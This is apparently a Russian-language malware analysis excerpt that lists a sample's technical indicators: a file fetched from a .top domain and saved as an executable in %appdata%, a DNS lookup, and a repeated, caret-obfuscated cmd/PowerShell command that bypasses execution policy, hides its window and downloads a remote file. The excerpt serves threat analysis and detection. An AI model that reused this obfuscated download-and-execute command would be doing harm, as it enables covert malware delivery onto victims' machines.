Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "po^WeRsh^eLL.EXE ^-^e^XE^cut^i^onpolIcy^ ^BY^paSS -^nOproFile ^-^WI^n^d^owS^t^Yle hiDd^eN (neW-objEc^t sy^ST^Em.n^eT^.W^Ebc^li^En^T).dOWNlOa^dfILe^('http://www.zonedopesa.t...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "po^WeRsh^eLL.EXE ^-^e^XE^cut^i^onpolIcy^ ^BY^paSS -^nOproFile ^-^WI^n^d^owS^t^Yle hiDd^eN (neW-objEc^t sy^ST^Em.n^eT^.W^Ebc^li^En^T).dOWNlOa^dfILe^('http://www.zonedopesa.t...' (со скрытым окном)